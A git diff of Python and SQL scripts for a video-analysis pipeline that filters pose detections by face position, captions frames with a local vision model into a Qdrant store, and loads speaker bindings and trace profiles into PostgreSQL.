cur.execute("SELECT id FROM talents WHERE real_name = %s", (best_person,))
|
||||
row = cur.fetchone()
|
||||
if row:
|
||||
talent_id = row[0]
|
||||
else:
|
||||
cur.execute(
|
||||
"INSERT INTO talents (real_name) VALUES (%s) RETURNING id",
|
||||
(best_person,),
|
||||
)
|
||||
talent_id = cur.fetchone()[0]
|
||||
print(f" Created Talent #{talent_id} ({best_person})")
|
||||
|
||||
cur.execute(
|
||||
"""
|
||||
INSERT INTO identity_bindings (talent_id, binding_type, binding_value, source, confidence)
|
||||
VALUES (%s, 'speaker', %s, 'auto_cluster', 0.8)
|
||||
ON CONFLICT (binding_type, binding_value) DO UPDATE SET talent_id = EXCLUDED.talent_id
|
||||
""",
|
||||
(talent_id, speaker),
|
||||
)
|
||||
print(f" Bound {speaker} -> {best_person}")
|
||||
|
||||
conn.commit()
|
||||
cur.close()
|
||||
conn.close()
|
||||
except Exception as e:
|
||||
print(f" DB Error: {e}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,128 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Filter pose.json - remove poses that don't match any face.
|
||||
|
||||
Usage: python3 filter_pose_by_face.py --uuid <uuid> --threshold <px>
|
||||
"""
|
||||
|
||||
import json
|
||||
import argparse
|
||||
import os
|
||||
|
||||
def filter_pose_by_face(face_path, pose_path, output_path, threshold=100.0):
|
||||
with open(face_path) as f:
|
||||
face_data = json.load(f)
|
||||
with open(pose_path) as f:
|
||||
pose_data = json.load(f)
|
||||
|
||||
# Build frame -> faces lookup
|
||||
face_by_frame = {}
|
||||
for fr in face_data.get('frames', []):
|
||||
fn = fr.get('frame')
|
||||
if fn is not None:
|
||||
face_by_frame[fn] = fr.get('faces', [])
|
||||
|
||||
filtered_frames = []
|
||||
total_poses = 0
|
||||
filtered_poses = 0
|
||||
matched_poses = 0
|
||||
|
||||
for fr in pose_data.get('frames', []):
|
||||
fn = fr.get('frame')
|
||||
persons = fr.get('persons', [])
|
||||
faces = face_by_frame.get(fn, [])
|
||||
|
||||
if not faces or not persons:
|
||||
# No faces or no persons - keep frame only if it has persons
|
||||
if persons:
|
||||
filtered_frames.append(fr)
|
||||
total_poses += len(persons)
|
||||
filtered_poses += len(persons)
|
||||
continue
|
||||
|
||||
filtered_persons = []
|
||||
for person in persons:
|
||||
total_poses += 1
|
||||
bbox = person.get('bbox', {})
|
||||
# Find nose keypoint
|
||||
nose_kp = None
|
||||
for kp in person.get('keypoints', []):
|
||||
if 'nose' in kp.get('name', '').lower():
|
||||
nose_kp = kp
|
||||
break
|
||||
|
||||
if nose_kp is None:
|
||||
# No nose keypoint - discard
|
||||
filtered_poses += 1
|
||||
continue
|
||||
|
||||
nose_x = nose_kp['x']
|
||||
nose_y = nose_kp['y']
|
||||
|
||||
# Check distance to any face center
|
||||
matched = False
|
||||
for face in faces:
|
||||
fcx = face['x'] + face['width'] / 2
|
||||
fcy = face['y'] + face['height'] / 2
|
||||
dist = abs(fcx - nose_x) + abs(fcy - nose_y)
|
||||
if dist < threshold:
|
||||
matched = True
|
||||
break
|
||||
|
||||
if matched:
|
||||
matched_poses += 1
|
||||
filtered_persons.append(person)
|
||||
else:
|
||||
filtered_poses += 1
|
||||
|
||||
if filtered_persons:
|
||||
filtered_frames.append({
|
||||
'frame': fn,
|
||||
'timestamp': fr.get('timestamp'),
|
||||
'persons': filtered_persons
|
||||
})
|
||||
|
||||
# Build output
|
||||
output = {
|
||||
'frame_count': pose_data.get('frame_count', 0),
|
||||
'fps': pose_data.get('fps', 0),
|
||||
'frames': filtered_frames,
|
||||
'filter_stats': {
|
||||
'total_poses': total_poses,
|
||||
'filtered_poses': filtered_poses,
|
||||
'matched_poses': matched_poses,
|
||||
'threshold': threshold
|
||||
}
|
||||
}
|
||||
|
||||
os.makedirs(os.path.dirname(output_path), exist_ok=True)
|
||||
with open(output_path, 'w') as f:
|
||||
json.dump(output, f, indent=2)
|
||||
|
||||
print(f"Filter complete (threshold: {threshold}px)")
|
||||
print(f" Total poses: {total_poses}")
|
||||
print(f" Matched (kept): {matched_poses} ({matched_poses/max(1,total_poses)*100:.1f}%)")
|
||||
print(f" Filtered out: {filtered_poses} ({filtered_poses/max(1,total_poses)*100:.1f}%)")
|
||||
print(f" Output frames: {len(filtered_frames)}")
|
||||
print(f" Saved to: {output_path}")
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument('--uuid', required=True)
|
||||
parser.add_argument('--threshold', type=float, default=100.0)
|
||||
parser.add_argument('--output-dir', default=None)
|
||||
args = parser.parse_args()
|
||||
|
||||
output_dir = args.output_dir or os.environ.get('MOMENTRY_OUTPUT_DIR', '/Users/accusys/momentry/output')
|
||||
face_path = os.path.join(output_dir, f'{args.uuid}.face.json')
|
||||
pose_path = os.path.join(output_dir, f'{args.uuid}.pose.json')
|
||||
output_path = os.path.join(output_dir, f'{args.uuid}.pose_filtered.json')
|
||||
|
||||
if not os.path.exists(face_path):
|
||||
print(f"Error: face.json not found: {face_path}")
|
||||
exit(1)
|
||||
if not os.path.exists(pose_path):
|
||||
print(f"Error: pose.json not found: {pose_path}")
|
||||
exit(1)
|
||||
|
||||
filter_pose_by_face(face_path, pose_path, output_path, args.threshold)
|
||||
@@ -0,0 +1,189 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Filter Poses by Face Alignment
|
||||
|
||||
Removes pose detections where face keypoints (nose, left_eye, right_eye)
|
||||
do not all fall within a corresponding face bbox.
|
||||
|
||||
Usage:
|
||||
python3 scripts/filter_poses_by_face.py --file-uuid <uuid> [--output-dir /path/to/output]
|
||||
|
||||
Output:
|
||||
{uuid}.pose.cleaned.json - Filtered pose data
|
||||
{uuid}.pose.stats.json - Statistics (removed, kept)
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
def point_in_bbox(x: float, y: float, bbox: dict) -> bool:
|
||||
"""Check if point is inside bbox."""
|
||||
return (
|
||||
bbox['x'] <= x <= bbox['x'] + bbox['width'] and
|
||||
bbox['y'] <= y <= bbox['y'] + bbox['height']
|
||||
)
|
||||
|
||||
|
||||
def face_keypoints_in_bbox(keypoints: list, bbox: dict) -> bool:
|
||||
"""Check if nose, left_eye, right_eye are all in bbox."""
|
||||
required = {'nose', 'left_eye', 'right_eye'}
|
||||
kp_dict = {kp['name']: kp for kp in keypoints if kp['name'] in required}
|
||||
|
||||
if len(kp_dict) < 3:
|
||||
return False
|
||||
|
||||
for name in required:
|
||||
kp = kp_dict[name]
|
||||
if not point_in_bbox(kp['x'], kp['y'], bbox):
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
|
||||
def filter_poses(face_data: dict, pose_data: dict) -> tuple:
|
||||
"""
|
||||
Filter poses based on face alignment.
|
||||
|
||||
Returns:
|
||||
(cleaned_pose_data, stats)
|
||||
"""
|
||||
frames_map = {}
|
||||
|
||||
# Build frame -> faces mapping from face_traced.json
|
||||
frames = face_data.get('frames', {})
|
||||
if isinstance(frames, dict):
|
||||
# Dict format: {"frame_num": {...}}
|
||||
for frame_num, frame_data in frames.items():
|
||||
faces = frame_data.get('faces', [])
|
||||
bboxes = []
|
||||
for f in faces:
|
||||
if 'bbox' in f:
|
||||
bboxes.append(f['bbox'])
|
||||
else:
|
||||
bboxes.append({'x': f.get('x', 0), 'y': f.get('y', 0),
|
||||
'width': f.get('width', 0), 'height': f.get('height', 0)})
|
||||
frames_map[int(frame_num)] = bboxes
|
||||
elif isinstance(frames, list):
|
||||
# List format
|
||||
for frame_data in frames:
|
||||
frame_num = frame_data.get('frame', frame_data.get('frame_number', 0))
|
||||
faces = frame_data.get('faces', [])
|
||||
bboxes = []
|
||||
for f in faces:
|
||||
if 'bbox' in f:
|
||||
bboxes.append(f['bbox'])
|
||||
else:
|
||||
bboxes.append({'x': f.get('x', 0), 'y': f.get('y', 0),
|
||||
'width': f.get('width', 0), 'height': f.get('height', 0)})
|
||||
frames_map[frame_num] = bboxes
|
||||
|
||||
print(f"[pose_filter] Loaded {len(frames_map)} frames with face data")
|
||||
|
||||
# Filter poses
|
||||
cleaned_frames = []
|
||||
total_poses = 0
|
||||
removed_poses = 0
|
||||
|
||||
for frame in pose_data.get('frames', []):
|
||||
frame_num = frame.get('frame', frame.get('frame_number', 0))
|
||||
face_bboxes = frames_map.get(frame_num, [])
|
||||
|
||||
kept_persons = []
|
||||
for person in frame.get('persons', []):
|
||||
total_poses += 1
|
||||
keypoints = person.get('keypoints', [])
|
||||
|
||||
# Check if aligned with any face bbox
|
||||
aligned = any(
|
||||
face_keypoints_in_bbox(keypoints, bbox)
|
||||
for bbox in face_bboxes
|
||||
) if face_bboxes else False
|
||||
|
||||
if aligned:
|
||||
kept_persons.append(person)
|
||||
else:
|
||||
removed_poses += 1
|
||||
|
||||
if kept_persons:
|
||||
cleaned_frames.append({
|
||||
**frame,
|
||||
'persons': kept_persons,
|
||||
})
|
||||
|
||||
cleaned = {
|
||||
**pose_data,
|
||||
'frames': cleaned_frames,
|
||||
'frame_count': len(cleaned_frames),
|
||||
}
|
||||
|
||||
stats = {
|
||||
'total_poses': total_poses,
|
||||
'kept_poses': total_poses - removed_poses,
|
||||
'removed_poses': removed_poses,
|
||||
'removal_rate': f"{removed_poses / total_poses * 100:.1f}%" if total_poses > 0 else "0%",
|
||||
'frames_with_faces': len(frames_map),
|
||||
'frames_kept': len(cleaned_frames),
|
||||
}
|
||||
|
||||
return cleaned, stats
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Filter poses by face alignment")
|
||||
parser.add_argument('--file-uuid', '-u', required=True, help="File UUID")
|
||||
parser.add_argument('--output-dir', '-o', default='/Users/accusys/momentry/output', help="Output directory")
|
||||
args = parser.parse_args()
|
||||
|
||||
output_path = Path(args.output_dir)
|
||||
|
||||
# Load face data
|
||||
face_path = output_path / f"{args.file_uuid}.face_traced.json"
|
||||
if not face_path.exists():
|
||||
print(f"[pose_filter] Face file not found: {face_path}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
print(f"[pose_filter] Loading {face_path.name}...")
|
||||
with open(face_path) as f:
|
||||
face_data = json.load(f)
|
||||
|
||||
# Load pose data
|
||||
pose_path = output_path / f"{args.file_uuid}.pose.json"
|
||||
if not pose_path.exists():
|
||||
print(f"[pose_filter] Pose file not found: {pose_path}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
print(f"[pose_filter] Loading {pose_path.name}...")
|
||||
with open(pose_path) as f:
|
||||
pose_data = json.load(f)
|
||||
|
||||
print(f"[pose_filter] Pose frames: {len(pose_data.get('frames', []))}")
|
||||
|
||||
# Filter
|
||||
print(f"[pose_filter] Filtering poses...")
|
||||
cleaned, stats = filter_poses(face_data, pose_data)
|
||||
|
||||
# Save cleaned pose
|
||||
cleaned_path = output_path / f"{args.file_uuid}.pose.cleaned.json"
|
||||
with open(cleaned_path, 'w') as f:
|
||||
json.dump(cleaned, f)
|
||||
print(f"[pose_filter] Saved: {cleaned_path}")
|
||||
|
||||
# Save stats
|
||||
stats_path = output_path / f"{args.file_uuid}.pose.stats.json"
|
||||
with open(stats_path, 'w') as f:
|
||||
json.dump(stats, f, indent=2)
|
||||
print(f"[pose_filter] Stats: {stats_path}")
|
||||
|
||||
# Print summary
|
||||
print(f"\n[pose_filter] === SUMMARY ===")
|
||||
print(f" Total poses: {stats['total_poses']}")
|
||||
print(f" Kept poses: {stats['kept_poses']}")
|
||||
print(f" Removed poses: {stats['removed_poses']} ({stats['removal_rate']})")
|
||||
print(f" Frames kept: {stats['frames_kept']}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,22 @@
|
||||
-- Fix stale_processing files: status='processing' but job_id IS NULL
|
||||
-- These files should be reset to 'pending' so they can be processed properly
|
||||
|
||||
-- Show current state
|
||||
SELECT file_uuid, file_name, status, job_id
|
||||
FROM videos
|
||||
WHERE status = 'processing' AND job_id IS NULL;
|
||||
|
||||
-- Fix: Reset to pending
|
||||
UPDATE videos
|
||||
SET status = 'pending', processing_status = NULL
|
||||
WHERE status = 'processing' AND job_id IS NULL;
|
||||
|
||||
-- Verify fix
|
||||
SELECT file_uuid, file_name, status, job_id
|
||||
FROM videos
|
||||
WHERE file_uuid IN (
|
||||
'5e207a246fd6a2a65ee0a267440465ee',
|
||||
'9cbeb112fcc5452e869755a539478061',
|
||||
'bfba056f5021e2404b0870cc0b1fa851',
|
||||
'2d0ec3a72d5dda98b10b3eb777650846'
|
||||
);
|
||||
@@ -86,6 +86,7 @@ if __name__ == "__main__":
|
||||
parser.add_argument("output_path")
|
||||
parser.add_argument("--uuid", "-u", default="")
|
||||
parser.add_argument("--sample-interval", type=int, default=3)
|
||||
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
|
||||
args = parser.parse_args()
|
||||
|
||||
publisher = RedisPublisher(args.uuid) if args.uuid else None
|
||||
|
||||
@@ -0,0 +1,303 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Interval VLM Caption - Analyze video at regular intervals (10s default)
|
||||
|
||||
Extracts frames on-the-fly with ffmpeg (no pre-storage) and analyzes with VLM.
|
||||
Runs in background, non-blocking.
|
||||
|
||||
Usage:
|
||||
python interval_vlm_caption.py --file-uuid abc123 --video /path/to/video.mp4
|
||||
python interval_vlm_caption.py --file-uuid abc123 --video /path/to/video.mp4 --interval 10
|
||||
|
||||
Output:
|
||||
{output_dir}/{uuid}_interval_profile.json
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import base64
|
||||
import json
|
||||
import os
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
import requests
|
||||
except ImportError:
|
||||
print("requests not installed: pip install requests", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def get_video_duration(video_path: str) -> float:
|
||||
"""Get video duration in seconds using ffprobe."""
|
||||
cmd = [
|
||||
"ffprobe", "-v", "quiet",
|
||||
"-show_entries", "format=duration",
|
||||
"-of", "json",
|
||||
video_path
|
||||
]
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True, text=True)
|
||||
if result.returncode != 0:
|
||||
return 0.0
|
||||
|
||||
data = json.loads(result.stdout)
|
||||
return float(data["format"]["duration"])
|
||||
|
||||
|
||||
def extract_frame_at_time(video_path: str, timestamp_sec: float, output_path: str) -> bool:
|
||||
"""Extract a single frame at specific timestamp."""
|
||||
cmd = [
|
||||
"ffmpeg", "-y", "-v", "quiet",
|
||||
"-ss", str(timestamp_sec),
|
||||
"-i", video_path,
|
||||
"-vframes", "1",
|
||||
"-q:v", "2",
|
||||
output_path
|
||||
]
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True)
|
||||
return result.returncode == 0
|
||||
|
||||
|
||||
def call_vlm(image_path: str, prompt: str, model: str = "llava:7b", ollama_url: str = "http://localhost:11434") -> str:
|
||||
"""Call Ollama VLM API."""
|
||||
with open(image_path, "rb") as f:
|
||||
image_b64 = base64.b64encode(f.read()).decode("utf-8")
|
||||
|
||||
payload = {
|
||||
"model": model,
|
||||
"prompt": prompt,
|
||||
"images": [image_b64],
|
||||
"stream": False,
|
||||
"options": {"num_predict": 100}
|
||||
}
|
||||
|
||||
try:
|
||||
resp = requests.post(f"{ollama_url}/api/generate", json=payload, timeout=30)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
return data.get("response", "").strip()
|
||||
except Exception as e:
|
||||
print(f"[vlm] API error: {e}", file=sys.stderr)
|
||||
return ""
|
||||
|
||||
|
||||
def get_embedding(text: str, model: str = "nomic-embed-text-v2-moe", ollama_url: str = "http://localhost:11434") -> list:
|
||||
"""Get embedding from Ollama."""
|
||||
try:
|
||||
resp = requests.post(
|
||||
f"{ollama_url}/api/embed",
|
||||
json={"model": model, "input": text},
|
||||
timeout=30,
|
||||
)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
return data.get("embeddings", [[]])[0]
|
||||
except Exception as e:
|
||||
print(f"[vlm] Embedding error: {e}", file=sys.stderr)
|
||||
return []
|
||||
|
||||
|
||||
def store_to_qdrant(analysis: dict, file_uuid: str, interval_index: int, timestamp_sec: float, qdrant_url: str = "http://localhost:6333", qdrant_api_key: str = None) -> bool:
|
||||
"""Store VLM results to Qdrant _vlm collection."""
|
||||
description = analysis.get("vlm_description", "")
|
||||
if not description:
|
||||
return False
|
||||
|
||||
# Get embedding
|
||||
embedding = get_embedding(description)
|
||||
if not embedding:
|
||||
print(f"[vlm] Failed to get embedding for interval_{interval_index}", file=sys.stderr)
|
||||
return False
|
||||
|
||||
# Generate point ID
|
||||
import hashlib
|
||||
point_id = int(hashlib.md5(f"{file_uuid}_interval_{interval_index}".encode()).hexdigest()[:16], 16)
|
||||
|
||||
# Build payload
|
||||
payload = {
|
||||
"type": "interval",
|
||||
"file_uuid": file_uuid,
|
||||
"interval_index": interval_index,
|
||||
"timestamp_sec": timestamp_sec,
|
||||
**analysis,
|
||||
}
|
||||
|
||||
# Upsert to Qdrant
|
||||
try:
|
||||
headers = {}
|
||||
if qdrant_api_key:
|
||||
headers["api-key"] = qdrant_api_key
|
||||
|
||||
resp = requests.put(
|
||||
f"{qdrant_url}/collections/_vlm/points?wait=true",
|
||||
json={
|
||||
"points": [{
|
||||
"id": point_id,
|
||||
"vector": embedding,
|
||||
"payload": payload,
|
||||
}]
|
||||
},
|
||||
headers=headers,
|
||||
timeout=30,
|
||||
)
|
||||
resp.raise_for_status()
|
||||
print(f"[vlm] Stored to Qdrant: interval_{interval_index}")
|
||||
return True
|
||||
except Exception as e:
|
||||
print(f"[vlm] Qdrant error: {e}", file=sys.stderr)
|
||||
return False
|
||||
|
||||
|
||||
def analyze_frame(image_path: str, model: str = "llava:7b") -> dict:
|
||||
"""Analyze a single frame with VLM - scene/background focus."""
|
||||
# Prompt 1: Scene description (concise)
|
||||
desc_prompt = "Describe this scene in one sentence. Focus on: location, main activity, visible objects. If unclear, say 'unclear'. Do not guess."
|
||||
description = call_vlm(image_path, desc_prompt, model)
|
||||
|
||||
# Prompt 2: Classification (JSON)
|
||||
class_prompt = "Classify the scene. Answer in JSON: {\"location\": \"indoor/outdoor/unknown\", \"setting\": \"office/street/home/nature/studio/unknown\", \"lighting\": \"day/night/indoor-light/mixed/unknown\"}. Use 'unknown' if uncertain."
|
||||
class_raw = call_vlm(image_path, class_prompt, model)
|
||||
|
||||
class_data = {}
|
||||
try:
|
||||
class_clean = class_raw.replace("```json", "").replace("```", "").strip()
|
||||
class_data = json.loads(class_clean)
|
||||
except:
|
||||
class_data = {}
|
||||
|
||||
# Prompt 3: People count
|
||||
people_prompt = "How many people? Answer a number or 'unclear'."
|
||||
people_count = call_vlm(image_path, people_prompt, model).strip()
|
||||
|
||||
# Prompt 4: Tags
|
||||
tags_prompt = "List 3 tags for this scene, comma-separated. Examples: office, street, crowd, nature."
|
||||
tags_raw = call_vlm(image_path, tags_prompt, model)
|
||||
tags = [t.strip() for t in tags_raw.replace(",", " ").split() if t.strip()][:3]
|
||||
|
||||
return {
|
||||
"vlm_description": description,
|
||||
"vlm_location": class_data.get("location", "unknown"),
|
||||
"vlm_setting": class_data.get("setting", "unknown"),
|
||||
"vlm_lighting": class_data.get("lighting", "unknown"),
|
||||
"vlm_people_count": people_count,
|
||||
"vlm_tags": tags,
|
||||
}
|
||||
|
||||
|
||||
def analyze_intervals(
|
||||
file_uuid: str,
|
||||
video_path: str,
|
||||
interval_sec: float = 10.0,
|
||||
output_dir: str = "/Users/accusys/momentry/output",
|
||||
model: str = "llava:7b",
|
||||
store_qdrant: bool = True,
|
||||
) -> dict:
|
||||
"""
|
||||
Analyze video at regular intervals.
|
||||
|
||||
Returns:
|
||||
Summary dict with all interval analyses
|
||||
"""
|
||||
# Get video duration
|
||||
duration = get_video_duration(video_path)
|
||||
if duration <= 0:
|
||||
print(f"[vlm] Cannot get video duration: {video_path}", file=sys.stderr)
|
||||
return {"error": "Cannot get duration"}
|
||||
|
||||
print(f"[vlm] Video: {duration:.1f}s, interval: {interval_sec}s")
|
||||
|
||||
# Calculate timestamps
|
||||
timestamps = []
|
||||
t = 0.0
|
||||
while t < duration:
|
||||
timestamps.append(t)
|
||||
t += interval_sec
|
||||
|
||||
print(f"[vlm] Total frames to analyze: {len(timestamps)}")
|
||||
|
||||
results = []
|
||||
qdrant_api_key = os.environ.get("QDRANT_API_KEY")
|
||||
|
||||
# Create temp directory for frames
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
for i, ts in enumerate(timestamps):
|
||||
frame_path = f"{tmpdir}/frame_{i:04d}.jpg"
|
||||
|
||||
# Extract frame
|
||||
success = extract_frame_at_time(video_path, ts, frame_path)
|
||||
if not success:
|
||||
print(f"[vlm] Failed to extract frame at {ts:.1f}s", file=sys.stderr)
|
||||
continue
|
||||
|
||||
# Analyze
|
||||
print(f"[vlm] [{i+1}/{len(timestamps)}] {ts:.1f}s...", end=" ", flush=True)
|
||||
start_time = time.time()
|
||||
|
||||
analysis = analyze_frame(frame_path, model)
|
||||
|
||||
# Store to Qdrant
|
||||
if store_qdrant:
|
||||
store_to_qdrant(analysis, file_uuid, i, ts, qdrant_api_key=qdrant_api_key)
|
||||
|
||||
elapsed = time.time() - start_time
|
||||
print(f"done ({elapsed:.1f}s)")
|
||||
|
||||
results.append({
|
||||
"interval_index": i,
|
||||
"timestamp_sec": round(ts, 1),
|
||||
**analysis,
|
||||
})
|
||||
|
||||
# Save profile
|
||||
profile = {
|
||||
"file_uuid": file_uuid,
|
||||
"video_duration_sec": round(duration, 1),
|
||||
"interval_sec": interval_sec,
|
||||
"total_intervals": len(timestamps),
|
||||
"analyzed": len(results),
|
||||
"model": model,
|
||||
"intervals": results,
|
||||
}
|
||||
|
||||
output_path = Path(output_dir)
|
||||
output_path.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
profile_path = output_path / f"{file_uuid}_interval_profile.json"
|
||||
with open(profile_path, "w") as f:
|
||||
json.dump(profile, f, indent=2)
|
||||
|
||||
print(f"[vlm] Saved: {profile_path}")
|
||||
|
||||
return profile
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="VLM analysis at regular intervals")
|
||||
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
|
||||
parser.add_argument("--video", "-v", required=True, help="Video file path")
|
||||
parser.add_argument("--interval", "-i", type=float, default=10.0, help="Interval in seconds (default: 10)")
|
||||
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
|
||||
parser.add_argument("--model", "-m", default="llava:7b", help="VLM model name")
|
||||
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
|
||||
args = parser.parse_args()
|
||||
|
||||
result = analyze_intervals(
|
||||
args.file_uuid,
|
||||
args.video,
|
||||
args.interval,
|
||||
args.output_dir,
|
||||
args.model,
|
||||
)
|
||||
|
||||
if args.json:
|
||||
print(json.dumps(result, indent=2))
|
||||
else:
|
||||
print(f"Analyzed {result.get('analyzed', 0)} intervals")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,257 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Load trace_profile.json files into PostgreSQL trace_profiles table.
|
||||
|
||||
Usage:
|
||||
python3 scripts/load_trace_profiles.py [--output-dir OUTPUT_DIR] [--dry-run]
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
import psycopg2
|
||||
from psycopg2.extras import execute_values
|
||||
|
||||
|
||||
def get_db_connection():
|
||||
"""Get PostgreSQL connection."""
|
||||
database_url = os.environ.get(
|
||||
"DATABASE_URL", "postgresql://accusys@localhost:5432/momentry"
|
||||
)
|
||||
return psycopg2.connect(database_url)
|
||||
|
||||
|
||||
def parse_trace_profile(json_path: Path) -> dict | None:
|
||||
"""Parse trace_profile.json and extract relevant fields."""
|
||||
try:
|
||||
with open(json_path, "r", encoding="utf-8") as f:
|
||||
data = json.load(f)
|
||||
except Exception as e:
|
||||
print(f" [ERROR] Failed to read {json_path}: {e}")
|
||||
return None
|
||||
|
||||
# Extract file_uuid and trace_id from path
|
||||
parts = json_path.parts
|
||||
file_uuid = None
|
||||
trace_id = None
|
||||
|
||||
for i, part in enumerate(parts):
|
||||
if part.startswith("trace_"):
|
||||
trace_id = int(part.replace("trace_", ""))
|
||||
if i > 0:
|
||||
file_uuid = parts[i - 1]
|
||||
break
|
||||
|
||||
if not file_uuid or trace_id is None:
|
||||
print(f" [WARN] Cannot extract file_uuid/trace_id from {json_path}")
|
||||
return None
|
||||
|
||||
return {
|
||||
"file_uuid": file_uuid,
|
||||
"trace_id": trace_id,
|
||||
"name": data.get("label") or data.get("name"),
|
||||
"start_frame": data.get("start_frame"),
|
||||
"end_frame": data.get("end_frame"),
|
||||
"frame_count": data.get("frame_count"),
|
||||
"key_frame": data.get("key_frame"),
|
||||
"status": data.get("status", "pending"),
|
||||
"avg_confidence": data.get("avg_confidence"),
|
||||
"vlm_description": data.get("vlm_description"),
|
||||
"vlm_clothing": data.get("vlm_clothing"),
|
||||
"vlm_tags": data.get("vlm_tags", []),
|
||||
"vlm_location": data.get("vlm_location"),
|
||||
"vlm_setting": data.get("vlm_setting"),
|
||||
"vlm_lighting": data.get("vlm_lighting"),
|
||||
"vlm_weather": data.get("vlm_weather"),
|
||||
"vlm_hand_objects": data.get("vlm_hand_objects"),
|
||||
"vlm_has_plants": data.get("vlm_has_plants"),
|
||||
"vlm_has_animals": data.get("vlm_has_animals"),
|
||||
"vlm_background": data.get("vlm_background"),
|
||||
"vlm_bg_tags": data.get("vlm_bg_tags", []),
|
||||
"vlm_model": data.get("vlm_model"),
|
||||
}
|
||||
|
||||
|
||||
def insert_trace_profiles(conn, profiles: list[dict], dry_run: bool = False):
|
||||
"""Insert trace profiles into PostgreSQL."""
|
||||
if not profiles:
|
||||
print("No profiles to insert")
|
||||
return 0
|
||||
|
||||
schema = os.environ.get("DATABASE_SCHEMA", "public")
|
||||
table = f"{schema}.trace_profiles" if schema != "public" else "trace_profiles"
|
||||
|
||||
sql = f"""
|
||||
INSERT INTO {table} (
|
||||
file_uuid, trace_id, name, start_frame, end_frame, frame_count,
|
||||
key_frame, status, avg_confidence,
|
||||
vlm_description, vlm_clothing, vlm_tags, vlm_location, vlm_setting,
|
||||
vlm_lighting, vlm_weather, vlm_hand_objects, vlm_has_plants, vlm_has_animals,
|
||||
vlm_background, vlm_bg_tags, vlm_model
|
||||
) VALUES %s
|
||||
ON CONFLICT (file_uuid, trace_id) DO UPDATE SET
|
||||
name = EXCLUDED.name,
|
||||
start_frame = EXCLUDED.start_frame,
|
||||
end_frame = EXCLUDED.end_frame,
|
||||
frame_count = EXCLUDED.frame_count,
|
||||
key_frame = EXCLUDED.key_frame,
|
||||
status = EXCLUDED.status,
|
||||
avg_confidence = EXCLUDED.avg_confidence,
|
||||
vlm_description = EXCLUDED.vlm_description,
|
||||
vlm_clothing = EXCLUDED.vlm_clothing,
|
||||
vlm_tags = EXCLUDED.vlm_tags,
|
||||
vlm_location = EXCLUDED.vlm_location,
|
||||
vlm_setting = EXCLUDED.vlm_setting,
|
||||
vlm_lighting = EXCLUDED.vlm_lighting,
|
||||
vlm_weather = EXCLUDED.vlm_weather,
|
||||
vlm_hand_objects = EXCLUDED.vlm_hand_objects,
|
||||
vlm_has_plants = EXCLUDED.vlm_has_plants,
|
||||
vlm_has_animals = EXCLUDED.vlm_has_animals,
|
||||
vlm_background = EXCLUDED.vlm_background,
|
||||
vlm_bg_tags = EXCLUDED.vlm_bg_tags,
|
||||
vlm_model = EXCLUDED.vlm_model,
|
||||
updated_at = NOW()
|
||||
"""
|
||||
|
||||
if dry_run:
|
||||
print(f"[DRY-RUN] Would insert {len(profiles)} profiles")
|
||||
return len(profiles)
|
||||
|
||||
cursor = conn.cursor()
|
||||
|
||||
# Prepare values
|
||||
values = [
|
||||
(
|
||||
p["file_uuid"],
|
||||
p["trace_id"],
|
||||
p["name"],
|
||||
p["start_frame"],
|
||||
p["end_frame"],
|
||||
p["frame_count"],
|
||||
p["key_frame"],
|
||||
p["status"],
|
||||
p["avg_confidence"],
|
||||
p["vlm_description"],
|
||||
p["vlm_clothing"],
|
||||
p["vlm_tags"],
|
||||
p["vlm_location"],
|
||||
p["vlm_setting"],
|
||||
p["vlm_lighting"],
|
||||
p["vlm_weather"],
|
||||
p["vlm_hand_objects"],
|
||||
p["vlm_has_plants"],
|
||||
p["vlm_has_animals"],
|
||||
p["vlm_background"],
|
||||
p["vlm_bg_tags"],
|
||||
p["vlm_model"],
|
||||
)
|
||||
for p in profiles
|
||||
]
|
||||
|
||||
execute_values(cursor, sql, values)
|
||||
conn.commit()
|
||||
cursor.close()
|
||||
|
||||
return len(profiles)
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Load trace profiles into PostgreSQL")
|
||||
parser.add_argument(
|
||||
"--output-dir",
|
||||
default="/Users/accusys/momentry/output",
|
||||
help="Output directory containing trace_profile.json files",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--dry-run",
|
||||
action="store_true",
|
||||
help="Don't actually insert, just show what would be done",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--batch-size",
|
||||
type=int,
|
||||
default=100,
|
||||
help="Batch size for inserts",
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
